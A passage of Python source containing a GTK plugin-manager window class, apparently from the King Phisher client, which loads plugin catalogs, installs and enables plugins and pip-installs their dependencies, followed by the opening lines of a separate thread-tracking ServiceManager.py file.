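# The plugin id and parent window above are assumptions for illustration only.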
class PluginManagerWindow(gui_utilities.GladeGObject):
"""
The window which allows the user to selectively enable and disable plugins
for the client application. This also handles configuration changes, so the
enabled plugins will persist across application runs.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'expander_info',
'grid_catalog_repo_info',
'grid_plugin_info',
'label_catalog_repo_info_description',
'label_catalog_repo_info_for_description',
'label_catalog_repo_info_for_maintainers',
'label_catalog_repo_info_homepage',
'label_catalog_repo_info_maintainers',
'label_catalog_repo_info_title',
'label_plugin_info_authors',
'label_plugin_info_compatible',
'label_plugin_info_description',
'label_plugin_info_for_classifiers',
'label_plugin_info_for_compatible',
'label_plugin_info_for_references',
'label_plugin_info_homepage',
'label_plugin_info_title',
'label_plugin_info_version',
'listbox_plugin_info_classifiers',
'listbox_plugin_info_references',
'menubutton_plugin_info',
'paned_plugins',
'scrolledwindow_plugins',
'stack_info',
'treeview_plugins',
'textview_plugin_info',
'viewport_info',
'statusbar'
)
)
top_gobject = 'window'
# todo: this _tsafe note should be clarified in the documentation
# methods defined within this class that are suffixed with _tsafe are safe
# to be called from a non-GUI thread and by extension only call fellow
# _tsafe methods
def __init__(self, *args, **kwargs):
super(PluginManagerWindow, self).__init__(*args, **kwargs)
self.catalog_plugins = plugins.ClientCatalogManager(self.application.user_data_path)
self.plugin_path = os.path.join(self.application.user_data_path, 'plugins')
self.status_bar = self.gobjects['statusbar']
self._installed_plugins_treeview_tracker = None
"""
This is used to track and make sure all plugins make it into the
treeview. It is set each time catalogs are loaded or refreshed. Once the
loading operation is complete, any plugins that remain were not loaded
because their data (repository or id) is missing from the catalog, most
likely because it has been removed.
"""
self._worker_thread = None
self._worker_thread_start(self._load_catalogs_tsafe)
self.__load_errors = {}
self.__installing_plugin = None
tvm = managers.TreeViewManager(self.gobjects['treeview_plugins'])
toggle_renderer_enable = Gtk.CellRendererToggle()
toggle_renderer_enable.connect('toggled', self.signal_renderer_toggled_enable)
toggle_renderer_install = Gtk.CellRendererToggle()
toggle_renderer_install.connect('toggled', self.signal_renderer_toggled_install)
tvm.set_column_titles(
('Installed', 'Enabled', 'Title', 'Compatible', 'Version'),
column_offset=1,
renderers=(
toggle_renderer_install,
toggle_renderer_enable,
Gtk.CellRendererText(),
Gtk.CellRendererText(),
Gtk.CellRendererText()
)
)
tvm.column_views['Enabled'].set_cell_data_func(toggle_renderer_enable, self._toggle_enabled_cell_data_func)
tvm.column_views['Enabled'].add_attribute(toggle_renderer_enable, 'sensitive', 1)
tvm.column_views['Enabled'].add_attribute(toggle_renderer_enable, 'visible', 6)
tvm.column_views['Installed'].set_cell_data_func(toggle_renderer_install, self._toggle_install_cell_data_func)
tvm.column_views['Installed'].add_attribute(toggle_renderer_install, 'visible', 7)
tvm.column_views['Installed'].add_attribute(toggle_renderer_install, 'sensitive', 8)
self._model = Gtk.TreeStore(str, bool, bool, str, str, str, bool, bool, bool, str)
self._model.set_sort_column_id(3, Gtk.SortType.ASCENDING)
self.gobjects['treeview_plugins'].set_model(self._model)
self._tv_popup_menu = managers.MenuManager(tvm.get_popup_menu())
self._tv_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._tv_popup_menu.append('Reload', self.signal_popup_menu_activate_reload)
self._tv_popup_menu.append('Reload All', self.signal_popup_menu_activate_reload_all)
self._tv_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._tv_popup_menu.append('Show Documentation', self.signal_popup_menu_activate_show_documentation)
self._tv_popup_menu.append('Update', self.signal_popup_menu_activate_update)
self._info_popup_menu = managers.MenuManager()
self._info_popup_menu.append('Reload', self.signal_popup_menu_activate_reload)
self._info_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._info_popup_menu.append('Show Documentation', self.signal_popup_menu_activate_show_documentation)
self._info_popup_menu.append('Update', self.signal_popup_menu_activate_update)
self.gobjects['menubutton_plugin_info'].set_popup(self._info_popup_menu.menu)
self._update_status_bar('Loading...')
self.window.show()
paned = self.gobjects['paned_plugins']
self._paned_offset = paned.get_allocation().height - paned.get_position()
def __store_add_node(self, node, parent=None):
"""
Add a :py:class:`._ModelNode` to :py:attr:`._model`, recursively adding
child :py:class:`._ModelNode` or :py:class:`._ModelNamedRow` instances as
necessary. This is *not* tsafe.
:param node: The node to add to the TreeView model.
:type node: :py:class:`._ModelNode`
:param parent: An optional parent for the node, used for recursion.
"""
row = self._model.append(parent, node.row)
for child in node.children:
if isinstance(child, _ModelNode):
self.__store_add_node(child, parent=row)
elif isinstance(child, _ModelNamedRow):
self._model.append(row, child)
else:
raise TypeError('unsupported node child type')
def _add_catalog_to_tree_tsafe(self, catalog):
"""
Create a :py:class:`._ModelNode` instance representing the catalog and its
data, and add it to the TreeView model.
:param catalog: The catalog to add to the TreeView.
:type catalog: :py:class:`.Catalog`
"""
catalog_node = _ModelNode(
id=catalog.id,
installed=None,
enabled=True,
title=catalog.id,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_CATALOG
)
for repo in catalog.repositories.values():
repo_node = _ModelNode(
id=repo.id,
installed=None,
enabled=True,
title=repo.title,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_REPOSITORY
)
catalog_node.children.append(repo_node)
plugin_collection = self.catalog_plugins.get_collection(catalog.id, repo.id)
for plugin_info in plugin_collection.values():
installed = False
enabled = False
plugin_name = plugin_info['name']
install_src = self.config['plugins.installed'].get(plugin_name)
if install_src and repo.id == install_src['repo_id'] and catalog.id == install_src['catalog_id']:
installed = True
# plugin was added to treeview so it is removed from the temporary tracking dict
self._installed_plugins_treeview_tracker.pop(plugin_name)
enabled = plugin_name in self.config['plugins.enabled']
repo_node.children.append(_ModelNamedRow(
id=plugin_name,
installed=installed,
enabled=enabled,
title=plugin_info['title'],
compatibility='Yes' if self.catalog_plugins.is_compatible(catalog.id, repo.id, plugin_name) else 'No',
version=plugin_info['version'],
visible_enabled=True,
visible_installed=True,
sensitive_installed=True,
type=_ROW_TYPE_PLUGIN
))
gui_utilities.glib_idle_add_once(self.__store_add_node, catalog_node)
def _get_plugin_model_parents(self, plugin_model_row):
return _ModelNamedRow(*plugin_model_row.parent), _ModelNamedRow(*plugin_model_row.parent.parent)
def _on_plugin_load_error_tsafe(self, name, error):
# WARNING: this may not be called from the GUI thread
self.__load_errors[name] = (error, traceback.format_exception(*sys.exc_info(), limit=5))
def _pip_install(self, packages):
options = ['--no-color']
if self.application.user_library_path is None:
self.logger.warning('can not install packages without a defined library path')
return
options.extend(['--target', self.application.user_library_path])
args = [sys.executable, '-m', 'pip', 'install'] + options + packages
return startup.run_process(args)
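# For illustration (hypothetical paths), the command assembled above resembles:
#     /usr/bin/python3 -m pip install --no-color --target ~/.king-phisher/lib some-package
# so plugin dependencies are installed into the application's user library path
# rather than the system site-packages.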
def _plugin_disable(self, model_row):
named_row = _ModelNamedRow(*model_row)
self.application.plugin_manager.disable(named_row.id)
self.config['plugins.enabled'].remove(named_row.id)
model_row[_ModelNamedRow._fields.index('enabled')] = False
def _plugin_enable(self, model_row):
named_row = _ModelNamedRow(*model_row)
pm = self.application.plugin_manager
if not pm.loaded_plugins[named_row.id].is_compatible:
gui_utilities.show_dialog_error('Incompatible Plugin', self.window, 'This plugin is not compatible.')
return
if not pm.enable(named_row.id):
return
self._set_model_item(model_row.path, 'enabled', True)
self.config['plugins.enabled'].append(named_row.id)
def _plugin_install(self, model_row):
if not self._worker_thread_is_ready:
# check it here to fail fast, then self._worker_thread_start checks it again later
self._show_dialog_busy()
return
named_row = _ModelNamedRow(*model_row)
repo_model, catalog_model = self._get_plugin_model_parents(model_row)
if named_row.id in self.config['plugins.installed']:
plugin_src = self.config['plugins.installed'].get(named_row.id)
if plugin_src != {'catalog_id': catalog_model.id, 'repo_id': repo_model.id, 'plugin_id': named_row.id}:
window_question = 'A plugin with this name is already installed from another\nrepository. Do you want to replace it with this one?'
if not gui_utilities.show_dialog_yes_no('Plugin Already Installed', self.window, window_question):
return
if not self._remove_matching_plugin(named_row, plugin_src):
self.logger.warning("failed to uninstall plugin {0}".format(named_row.id))
return
self._worker_thread_start(self._plugin_install_tsafe, catalog_model, repo_model, model_row, named_row)
def _plugin_install_tsafe(self, catalog_model, repo_model, model_row, named_row):
self.__installing_plugin = named_row.id
self.logger.debug("installing plugin '{0}'".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {}...".format(named_row.title))
_show_dialog_error_tsafe = functools.partial(gui_utilities.glib_idle_add_once, gui_utilities.show_dialog_error, 'Failed To Install', self.window)
try:
self.catalog_plugins.install_plugin(catalog_model.id, repo_model.id, named_row.id, self.plugin_path)
except requests.exceptions.ConnectionError:
self.logger.warning("failed to download plugin {}".format(named_row.id))
_show_dialog_error_tsafe("Failed to download {} plugin, check your internet connection.".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {} failed.".format(named_row.title))
self.__installing_plugin = None
return
except Exception:
self.logger.warning("failed to install plugin {}".format(named_row.id), exc_info=True)
_show_dialog_error_tsafe("Failed to install {} plugin.".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {} failed.".format(named_row.title))
self.__installing_plugin = None
return
self.config['plugins.installed'][named_row.id] = {'catalog_id': catalog_model.id, 'repo_id': repo_model.id, 'plugin_id': named_row.id}
self.logger.info("installed plugin '{}' from catalog:{}, repository:{}".format(named_row.id, catalog_model.id, repo_model.id))
plugin = self._reload_plugin_tsafe(model_row, named_row)
if self.config['plugins.pip.install_dependencies']:
packages = smoke_zephyr.requirements.check_requirements(tuple(plugin.req_packages.keys()))
if packages:
self.logger.debug("installing missing or incompatible packages from PyPi for plugin '{0}'".format(named_row.id))
self._update_status_bar_tsafe(
"Installing {:,} dependenc{} for plugin {} from PyPi.".format(len(packages), 'y' if len(packages) == 1 else 'ies', named_row.title)
)
pip_results = self._pip_install(packages)
if pip_results is None:
self.logger.warning('pip install failed')
_show_dialog_error_tsafe(
"Failed to run pip to install package(s) for plugin {}.".format(named_row.id)
)
elif pip_results.status:
self.logger.warning('pip install failed, exit status: ' + str(pip_results.status))
_show_dialog_error_tsafe(
"Failed to install pip package(s) for plugin {}.".format(named_row.id)
)
else:
plugin = self._reload_plugin_tsafe(model_row, named_row)
self.__installing_plugin = None
gui_utilities.glib_idle_add_once(self.__plugin_install_post, catalog_model, repo_model, model_row, named_row)
def __plugin_install_post(self, catalog_model, repo_model, model_row, named_row):
# handles GUI related updates after data has been fetched from the internet
if model_row.path is not None:
self._set_model_item(model_row.path, 'installed', True)
self._set_model_item(model_row.path, 'version', self.catalog_plugins.get_collection(catalog_model.id, repo_model.id)[named_row.id]['version'])
if self._selected_model_row.path == model_row.path:
self._popup_menu_refresh(model_row)
self._update_status_bar("Finished installing plugin {}.".format(named_row.title))
def _plugin_uninstall(self, model_row):
named_row = _ModelNamedRow(*model_row)
if not self.application.plugin_manager.uninstall(named_row.id):
return False
del self.config['plugins.installed'][named_row.id]
if model_row.parent and model_row.parent[_ModelNamedRow._fields.index('id')] == _LOCAL_REPOSITORY_ID:
del self._model[model_row.path]
else:
self._set_model_item(model_row.path, 'installed', False)
self.logger.info("successfully uninstalled plugin {0}".format(named_row.id))
self._update_status_bar("Finished uninstalling plugin {}.".format(named_row.title))
return True
def _popup_menu_refresh(self, model_row):
named_row = _ModelNamedRow(*model_row)
sensitive = named_row.type == _ROW_TYPE_PLUGIN and named_row.installed
self._info_popup_menu['Show Documentation'].set_property('sensitive', sensitive)
self._tv_popup_menu['Show Documentation'].set_property('sensitive', sensitive)
sensitive = named_row.type == _ROW_TYPE_PLUGIN and named_row.installed and named_row.sensitive_installed
self._info_popup_menu['Update'].set_property('sensitive', sensitive)
self._tv_popup_menu['Update'].set_property('sensitive', sensitive)
def _reload(self):
model_row = self._selected_model_row
named_row = _ModelNamedRow(*model_row)
if named_row.type == _ROW_TYPE_CATALOG:
self._worker_thread_start(self._reload_catalog_tsafe, model_row, named_row)
elif named_row.type == _ROW_TYPE_REPOSITORY:
# this just reloads the entire parent catalog, individual repositories
# can not be reloaded at this time
parent_model_row = model_row.parent
parent_named_row = _ModelNamedRow(*parent_model_row)
if parent_named_row.type != _ROW_TYPE_CATALOG:
self.logger.warning('repository treeview row\'s parent is not a catalog')
return
self._worker_thread_start(self._reload_catalog_tsafe, parent_model_row, parent_named_row)
elif named_row.type == _ROW_TYPE_PLUGIN:
if not named_row.installed:
return
self._worker_thread_start(self._reload_plugin_tsafe, model_row, named_row)
else:
self.logger.warning('reload selected for an unsupported row type')
def _reload_catalog_tsafe(self, model_row, named_row):
self._update_status_bar_tsafe('Reloading catalog...')
self._model.remove(model_row.iter)
if named_row.id == _LOCAL_REPOSITORY_ID:
self._load_catalog_local_tsafe()
else:
catalog_url = self.catalog_plugins.get_cache().get_catalog_by_id(named_row.id)['url']
if catalog_url:
self._load_catalog_from_url_tsafe(catalog_url)
self._update_status_bar_tsafe('Reloading catalog... completed.')
def _reload_plugin_tsafe(self, model_row, named_row, enabled=None):
self._update_status_bar_tsafe('Reloading plugin...')
pm = self.application.plugin_manager
if enabled is None:
enabled = named_row.id in pm.enabled_plugins
pm.unload(named_row.id)
try:
klass = pm.load(named_row.id, reload_module=True)
except Exception as error:
self._on_plugin_load_error_tsafe(named_row.id, error)
klass = None
else:
if enabled:
pm.enable(named_row.id)
self.__load_errors.pop(named_row.id, None)
gui_utilities.glib_idle_add_once(self.__reload_plugin_post, model_row, named_row, klass)
return klass
def __reload_plugin_post(self, model_row, named_row, klass=None):
if model_row.path is not None:
if named_row.id == self._selected_named_row.id:
self._set_info(model_row)
if klass is None:
self._set_model_item(model_row.path, 'title', "{0} (Reload Failed)".format(named_row.id))
else:
self._set_model_item(model_row.path, 'title', klass.title)
self._set_model_item(model_row.path, 'compatibility', 'Yes' if klass.is_compatible else 'No')
self._set_model_item(model_row.path, 'version', klass.version)
self._update_status_bar('Reloading plugin... completed.')
def _remove_matching_plugin(self, named_row, plugin_src):
repo_model = None
for catalog_model in self._model:
catalog_id = _ModelNamedRow(*catalog_model).id
if plugin_src and catalog_id == plugin_src['catalog_id']:
repo_model = next((rm for rm in catalog_model.iterchildren() if _ModelNamedRow(*rm).id == plugin_src['repo_id']), None)
break
elif plugin_src is None and catalog_id == _LOCAL_REPOSITORY_ID:
# local installation acts as a pseudo-repository
repo_model = catalog_model
break
if not repo_model:
return False
for plugin_model_row in repo_model.iterchildren():
named_model = _ModelNamedRow(*plugin_model_row)
if named_model.id != named_row.id:
continue
if named_model.enabled:
self._plugin_disable(plugin_model_row)
self._plugin_uninstall(plugin_model_row)
return True
return False
@property
def _selected_model_row(self):
treeview = self.gobjects['treeview_plugins']
selection = treeview.get_selection()
if not selection.count_selected_rows():
return None
(model, tree_paths) = selection.get_selected_rows()
return model[tree_paths[0]]
@property
def _selected_named_row(self):
model_row = self._selected_model_row
return _ModelNamedRow(*model_row) if model_row else None
def _set_model_item(self, model_path, item, item_value):
self._model[model_path][_ModelNamedRow._fields.index(item)] = item_value
def _set_info(self, model_instance):
named_model = _ModelNamedRow(*model_instance)
stack = self.gobjects['stack_info']
textview = self.gobjects['textview_plugin_info']
buf = textview.get_buffer()
buf.delete(buf.get_start_iter(), buf.get_end_iter())
model_id = named_model.id
if named_model.type == _ROW_TYPE_PLUGIN:
if model_id in self.__load_errors:
stack.set_visible_child(textview)
self._set_info_plugin_error(model_instance)
else:
stack.set_visible_child(self.gobjects['grid_plugin_info'])
self._set_info_plugin(model_instance)
else:
self._set_info_nonplugin(model_instance)
def _set_info_nonplugin(self, model_instance):
stack = self.gobjects['stack_info']
stack.set_visible_child(self.gobjects['grid_catalog_repo_info'])
named_model = _ModelNamedRow(*model_instance)
obj_catalog = None
# hide catalog repo labels
self.gobjects['label_catalog_repo_info_maintainers'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_for_maintainers'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_description'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_for_description'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_homepage'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_title'].set_text(named_model.title)
if not named_model.id:
return
if named_model.type == _ROW_TYPE_CATALOG:
obj = self.catalog_plugins.catalogs.get(named_model.id, None)
if not obj:
return
else:
obj_catalog = self.catalog_plugins.catalogs.get(_ModelNamedRow(*model_instance.parent).id, None)
if not obj_catalog:
return
obj = self.catalog_plugins.catalogs[_ModelNamedRow(*model_instance.parent).id].repositories[named_model.id]
maintainers = getattr(obj, 'maintainers', getattr(obj_catalog, 'maintainers', None))
if maintainers:
self.gobjects['label_catalog_repo_info_maintainers'].set_text('\n'.join(maintainers))
self.gobjects['label_catalog_repo_info_maintainers'].set_property('visible', True)
self.gobjects['label_catalog_repo_info_for_maintainers'].set_property('visible', True)
if getattr(obj, 'description', None):
self.gobjects['label_catalog_repo_info_description'].set_text(obj.description)
self.gobjects['label_catalog_repo_info_description'].set_property('visible', True)
self.gobjects['label_catalog_repo_info_for_description'].set_property('visible', True)
if getattr(obj, 'homepage', None) or getattr(obj, 'url', None):
url = getattr(obj, 'homepage', getattr(obj, 'url', None))
self.gobjects['label_catalog_repo_info_homepage'].set_markup("<a href=\"{0}\">Homepage</a>".format(url.replace('"', '&quot;')))
self.gobjects['label_catalog_repo_info_homepage'].set_property('tooltip-text', url)
self.gobjects['label_catalog_repo_info_homepage'].set_property('visible', True)
def _set_info_plugin(self, plugin_model):
named_model = _ModelNamedRow(*plugin_model)
pm = self.application.plugin_manager
self._last_plugin_selected = plugin_model
if named_model.id in pm.loaded_plugins:
plugin = pm.loaded_plugins[named_model.id].metadata
is_compatible = plugin['is_compatible']
else:
repo_model, catalog_model = self._get_plugin_model_parents(plugin_model)
plugin = self.catalog_plugins.get_collection(catalog_model.id, repo_model.id)[named_model.id]
is_compatible = self.catalog_plugins.is_compatible(catalog_model.id, repo_model.id, named_model.id)
self.gobjects['label_plugin_info_title'].set_text(plugin['title'])
self.gobjects['label_plugin_info_compatible'].set_text('Yes' if is_compatible else 'No')
self.gobjects['label_plugin_info_version'].set_text(plugin['version'])
self.gobjects['label_plugin_info_authors'].set_text('\n'.join(plugin['authors']))
self.gobjects['label_plugin_info_description'].set_text(plugin['description'])
self._set_info_plugin_homepage_url(plugin['homepage'])
self._set_info_plugin_reference_urls(plugin.get('reference_urls', []))
classifiers = plugin.get('classifiers', [])
if classifiers:
self.gobjects['label_plugin_info_for_classifiers'].set_property('visible', True)
gui_utilities.gtk_listbox_populate_labels(
self.gobjects['listbox_plugin_info_classifiers'],
classifiers
)
else:
self.gobjects['label_plugin_info_for_classifiers'].set_property('visible', False)
def _set_info_plugin_error(self, model_instance):
id_ = _ModelNamedRow(*model_instance).id
textview = self.gobjects['textview_plugin_info']
buf = textview.get_buffer()
exc, formatted_exc = self.__load_errors[id_]
buf.insert(buf.get_end_iter(), "{0!r}\n\n".format(exc), -1)
buf.insert(buf.get_end_iter(), ''.join(formatted_exc), -1)
def _set_info_plugin_homepage_url(self, url=None):
label_homepage = self.gobjects['label_plugin_info_homepage']
if url is None:
label_homepage.set_property('visible', False)
return
label_homepage.set_markup("<a href=\"{0}\">Homepage</a>".format(url.replace('"', '&quot;')))
label_homepage.set_property('tooltip-text', url)
label_homepage.set_property('visible', True)
def _set_info_plugin_reference_urls(self, reference_urls):
label = self.gobjects['label_plugin_info_for_references']
listbox = self.gobjects['listbox_plugin_info_references']
gui_utilities.gtk_widget_destroy_children(listbox)
if not reference_urls:
label.set_property('visible', False)
listbox.set_property('visible', False)
return
label.set_property('visible', True)
listbox.set_property('visible', True)
for reference_url in reference_urls:
label = Gtk.Label()
label.connect('activate-link', self.signal_label_activate_link)
label.set_markup("<a href=\"{0}\">{1}</a>".format(reference_url.replace('"', '&quot;'), saxutils.escape(reference_url)))
label.set_property('halign', Gtk.Align.START)
label.set_property('track-visited-links', False)
label.set_property('use-markup', True)
label.set_property('valign', Gtk.Align.START)
label.set_property('visible', True)
listbox.add(label)
def _show_dialog_busy(self):
gui_utilities.show_dialog_warning('Currently Busy', self.window, 'An operation is already running.')
def _show_dialog_error_tsafe(self, title, message):
gui_utilities.glib_idle_add_once(gui_utilities.show_dialog_error, title, self.window, message)
def _toggle_enabled_cell_data_func(self, column, cell, model, tree_iter, _):
if model.get_value(tree_iter, 0) in self.__load_errors:
cell.set_property('inconsistent', True)
else:
cell.set_property('inconsistent', False)
def _toggle_install_cell_data_func(self, column, cell, model, tree_iter, _):
cell.set_property('inconsistent', model.get_value(tree_iter, 0) == self.__installing_plugin)
def _update_status_bar(self, string_to_set):
self.status_bar.pop(0)
self.status_bar.push(0, string_to_set)
def _update_status_bar_tsafe(self, string_to_set):
gui_utilities.glib_idle_add_once(self._update_status_bar, string_to_set)
def _worker_thread_start(self, target, *args, **kwargs):
"""
Start a worker thread. This must only be called from the main GUI thread
and *target* must be a tsafe method.
"""
if not self._worker_thread_is_ready:
self._show_dialog_busy()
self.logger.debug('plugin manager worker thread is alive, can not start a new one')
return False
self._worker_thread = utilities.Thread(target=target, args=args, kwargs=kwargs)
self._worker_thread.start()
return True
@property
def _worker_thread_is_ready(self):
return self._worker_thread is None or not self._worker_thread.is_alive()
#
# Catalog Loading Methods
#
# Each of these functions loads the catalog and handles adding it to the
# TreeView as necessary.
#
def _load_catalogs_tsafe(self, refresh=False):
self._installed_plugins_treeview_tracker = copy.deepcopy(self.config['plugins.installed'])
for plugin in list(self._installed_plugins_treeview_tracker.keys()):
# Remove plugins already found to be locally installed.
if not self._installed_plugins_treeview_tracker[plugin]:
self._installed_plugins_treeview_tracker.pop(plugin)
if refresh:
gui_utilities.glib_idle_add_once(self._model.clear)
expiration = datetime.timedelta(seconds=smoke_zephyr.utilities.parse_timespan(self.config.get('cache.age', '4h')))
self._update_status_bar_tsafe('Loading, catalogs...')
self._load_catalog_local_tsafe()
catalog_cache = self.catalog_plugins.get_cache()
now = datetime.datetime.utcnow()
for catalog_url in self.config['catalogs']:
catalog_cache_dict = catalog_cache.get_catalog_by_url(catalog_url)
if not refresh and catalog_cache_dict and catalog_cache_dict['created'] + expiration > now:
catalog = self._load_catalog_from_cache_tsafe(catalog_cache_dict)
if catalog is not None:
continue
catalog_cache_dict = None
self.logger.debug("downloading catalog: {}".format(catalog_url))
self._update_status_bar_tsafe("Loading, downloading catalog: {}".format(catalog_url))
catalog = self._load_catalog_from_url_tsafe(catalog_url)
if catalog is None and catalog_cache_dict is not None:
self.logger.warning('failing over to loading the catalog from the cache')
self._load_catalog_from_cache_tsafe(catalog_cache_dict)
if self._installed_plugins_treeview_tracker:
self._load_missing_plugins_tsafe()
self._update_status_bar_tsafe('Loading completed')
self._installed_plugins_treeview_tracker = None
def _load_missing_plugins_tsafe(self):
local_model_row = None
for plugin in self._installed_plugins_treeview_tracker.keys():
self.logger.warning("plugin {} was not found in any loaded catalog or repo, moving to locally installed".format(plugin))
self.config['plugins.installed'][plugin] = None
self._installed_plugins_treeview_tracker[plugin] = None
for model_row in self._model:
if _ModelNamedRow(*model_row).id == _LOCAL_REPOSITORY_ID:
gui_utilities.glib_idle_add_wait(self._model.remove, model_row.iter)
break
else:
raise RuntimeError('failed to find the local plugin repository')
self._load_catalog_local_tsafe()
def _load_catalog_from_cache_tsafe(self, catalog_cache_dict):
catalog = None
try:
catalog = Catalog(catalog_cache_dict['value'])
except (KeyError, TypeError) as error:
self.logger.warning("{0} error when trying to add catalog dict to manager".format(error.__class__.__name__))
else:
self.catalog_plugins.add_catalog(catalog, catalog_url=catalog_cache_dict['url'], cache=False)
self._add_catalog_to_tree_tsafe(catalog)
return catalog
def _load_catalog_from_url_tsafe(self, catalog_url):
catalog = None
try:
catalog = Catalog.from_url(catalog_url)
except requests.exceptions.ConnectionError:
self.logger.warning("connection error trying to download catalog url: {}".format(catalog_url))
self._show_dialog_error_tsafe('Catalog Loading Error', 'Failed to download catalog, check your internet connection.')
except Exception:
self.logger.warning('failed to add catalog by url: ' + catalog_url, exc_info=True)
self._show_dialog_error_tsafe('Catalog Loading Error', 'Failed to add catalog')
else:
self.catalog_plugins.add_catalog(catalog, catalog_url=catalog_url, cache=True)
self._add_catalog_to_tree_tsafe(catalog)
return catalog
def _load_catalog_local_tsafe(self):
"""
Load the plugins which are available into the treeview to make them
visible to the user.
"""
self.logger.debug('loading the local catalog')
pm = self.application.plugin_manager
self.__load_errors = {}
pm.load_all(on_error=self._on_plugin_load_error_tsafe)
node = _ModelNode(
id=_LOCAL_REPOSITORY_ID,
installed=None,
enabled=True,
title=_LOCAL_REPOSITORY_TITLE,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_CATALOG
)
for name, plugin in pm.loaded_plugins.items():
if self.config['plugins.installed'].get(name):
continue
self.config['plugins.installed'][name] = None
node.children.append(_ModelNamedRow(
id=plugin.name,
installed=True,
enabled=plugin.name in pm.enabled_plugins,
title=plugin.title,
compatibility='Yes' if plugin.is_compatible else 'No',
version=plugin.version,
visible_enabled=True,
visible_installed=True,
sensitive_installed=False,
type=_ROW_TYPE_PLUGIN
))
for name in self.__load_errors.keys():
node.children.append(_ModelNamedRow(
id=name,
installed=True,
enabled=False,
title="{0} (Load Failed)".format(name),
compatibility='No',
version='Unknown',
visible_enabled=True,
visible_installed=True,
sensitive_installed=False,
type=_ROW_TYPE_PLUGIN
))
gui_utilities.glib_idle_add_wait(self.__store_add_node, node)
#
# Signal Handlers
#
def signal_eventbox_button_press(self, widget, event):
if not (event.type == Gdk.EventType.BUTTON_PRESS and event.button == Gdk.BUTTON_PRIMARY):
return
if not self._last_plugin_selected:
return
named_plugin = _ModelNamedRow(*self._last_plugin_selected)
plugin_id = named_plugin.id
if plugin_id is None:
return
if plugin_id in self.application.plugin_manager:
klass = self.application.plugin_manager[plugin_id]
compatibility_details = list(klass.compatibility)
else:
repo_model, catalog_model = self._get_plugin_model_parents(self._last_plugin_selected)
compatibility_details = list(self.catalog_plugins.compatibility(catalog_model.id, repo_model.id, named_plugin.id))
popover = Gtk.Popover()
popover.set_relative_to(self.gobjects['label_plugin_info_for_compatible'])
grid = Gtk.Grid()
popover.add(grid)
grid.insert_column(0)
grid.insert_column(0)
grid.insert_column(0)
grid.set_column_spacing(3)
compatibility_details.insert(0, ('Type', 'Value', 'Met'))
row = 0
for row, req in enumerate(compatibility_details):
grid.insert_row(row)
label = Gtk.Label(req[0])
label.set_property('halign', Gtk.Align.START)
grid.attach(label, 0, row, 1, 1)
label = Gtk.Label(req[1])
label.set_property('halign', Gtk.Align.START)
grid.attach(label, 1, row, 1, 1)
label = Gtk.Label(('Yes' if req[2] else 'No') if row else req[2])
label.set_property('halign', Gtk.Align.END)
grid.attach(label, 2, row, 1, 1)
if not row:
popover.destroy()
return
popover.show_all()
def signal_expander_activate(self, expander):
paned = self.gobjects['paned_plugins']
if expander.get_property('expanded'): # collapsing
paned.set_position(paned.get_allocation().height + self._paned_offset)
def signal_label_activate_link(self, _, uri):
utilities.open_uri(uri)
def signal_paned_button_press_event(self, paned, event):
return not self.gobjects['expander_info'].get_property('expanded')
def signal_popup_menu_activate_reload(self, _):
self._reload()
def signal_popup_menu_activate_reload_all(self, _):
self._worker_thread_start(self._load_catalogs_tsafe, refresh=True)
def signal_popup_menu_activate_show_documentation(self, _):
named_row = self._selected_named_row
if named_row is None or named_row.type != _ROW_TYPE_PLUGIN:
return
if not named_row.installed:
gui_utilities.show_dialog_warning('No Documentation', self.window, 'This plugin has no documentation.')
return
try:
PluginDocumentationWindow(self.application, named_row.id)
except FileNotFoundError as error:
self.logger.warning(error.strerror)
gui_utilities.show_dialog_warning('No Documentation', self.window, error.strerror.capitalize() + '.')
def signal_popup_menu_activate_update(self, _):
model_row = self._selected_model_row
named_row = None if model_row is None else _ModelNamedRow(*model_row)
if named_row is None:
return
if not (named_row.type == _ROW_TYPE_PLUGIN and named_row.installed and named_row.sensitive_installed):
return
if not self._plugin_uninstall(model_row):
gui_utilities.show_dialog_error('Update Failed', self.window, 'Failed to uninstall the existing plugin data.')
return
self._plugin_install(model_row)
def signal_renderer_toggled_enable(self, _, path):
model_row = self._model[path]
named_row = _ModelNamedRow(*model_row)
if named_row.type != _ROW_TYPE_PLUGIN:
return
if named_row.id not in self.application.plugin_manager.loaded_plugins:
return
if named_row.id in self.__load_errors:
gui_utilities.show_dialog_error('Can Not Enable Plugin', self.window, 'Can not enable a plugin which failed to load.')
return
if named_row.enabled:
self._plugin_disable(model_row)
else:
self._plugin_enable(model_row)
def signal_renderer_toggled_install(self, _, path):
model_row = self._model[path]
named_row = _ModelNamedRow(*model_row)
if named_row.type == _ROW_TYPE_PLUGIN and named_row.installed:
self._plugin_uninstall(model_row)
else:
self._plugin_install(model_row)
if named_row.enabled:
self._plugin_enable(model_row)
def signal_treeview_row_activated(self, treeview, path, column):
model_row = self._model[path]
self._set_info(model_row)
self._popup_menu_refresh(model_row)
|
ServiceManager.py
|
import threading
from time import sleep
# ------------------------------------------------------------------
class ServiceManager():
"""keep track of all threads spawned in this proccess, and enable interruption
"""
threads = []
def __init__(self, service_name, *args, **kwargs):
# if service_name is None:
# return
# sleep duration for heartbeat loop of active instance
self.active_expire_sec = 5
self.loop_active_expire_sec = self.active_expire_sec * 0.25
self.active_instance_name = self.get_active_name(service_name)
return
# ------------------------------------------------------------------
@classmethod
def get_active_name(self, service_name):
return 'utils;active_instance;' + service_name
# ------------------------------------------------------------------
def can_loop(self, interrupt_sig=None):
"""check if the interrups signal has been set
"""
if interrupt_sig is None:
return not self.interrupt_sig.is_set()
else:
return not interrupt_sig.is_set()
# ------------------------------------------------------------------
def add_thread(self, target):
"""add thread to the general registry
"""
